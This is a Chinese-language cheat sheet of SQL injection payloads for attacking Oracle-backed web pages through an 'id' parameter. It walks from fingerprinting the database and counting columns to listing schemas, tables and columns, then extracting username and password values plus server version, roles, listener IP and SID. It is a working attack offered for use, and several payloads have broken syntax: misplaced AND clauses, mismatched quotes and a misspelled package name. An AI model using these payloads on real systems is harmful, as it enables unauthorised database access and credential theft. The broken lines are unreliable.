1.判斷是否爲oracle數據庫
id=88 and exists(select *from dual)
id=88 and exists(select *from user_tables)這兩個表都是系統表,返回正常則爲oralce數據庫
2.查詢字段數
order by 4 異常
order by 3 正常 最大列數爲3
3.判斷字段類型
id=88 union select null,null,null from dual 判斷這三個列是否有類型異常,返回正常則繼續
id=88 and 1=2 union select 'ss',null,null/null,'ss',null/null,null,'ss' 返回正常判斷哪個列數爲字符型 可用來顯示查詢結果
4獲取所有數據庫的名字(假設第二位爲字符型)
id=88 and 1=2 union select null,(select global_name from global_name),null from dual
id=88 and 1=2 union select null, (select sys.database_name from dual),null from dual
id=88 and 1=2 union select null,(select name from v$database),null from dual 幾個特殊的庫的名字
id=88 and 1=2 union select null,(select owner from all_tables where rownum=1),null from dual
id=88 and 1=2 union select null,(select owner from all_tables where owner<>'第一個庫名' and rownum=1),null from dual
id=88 and 1=2 union select null,(select owner from all_tables where owner<>'第一庫名'and owner <>'第二個庫名'and rownum=1),null from dual
每次查詢將前面的庫排除掉
5.獲取當前庫的所有表
id=88 and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual
id=88 and 1=2 union select null,(select table_name from user_tables where and table_name<>'第一個表名'rownum=1),null from dual
id=88 and 1=2 union select null,(select table_name from user_tables where and table_name<>'第一個表名'and table_name<>'第二個表名' and rownum=1),null from dual
6.查詢表的字段名
id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名'and rownum=1),null from dual
id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名 and column_name <>‘第一個字段名’and rownum=1),null from dual
id=88 and 1=2 union select null,(select column_name from user_tab_columns where table_name='表名 and column_name <>‘第一個字段名’ and column_name<>'第二個字段名'and rownum=1),null from dual
7.查詢字段值
id=88 and 1=2 union select null,username,password from '表名字'--
8.其他重要信息
null,(select banner from sys.v_$version where rownum=1)數據庫版本
null,(select * from session_roles where rownum=1)當前用戶權限
null,(select name from v$database) 數據庫名
null,(select table_name from user_tables where rownum=1)當前庫所有表
null,(select member from v$logfile where rownum=1)服務器系統
null,(select utl_inadder.get_host_address from dual)服務器監聽IP
null,(select instance_name from v$instance)數據庫SID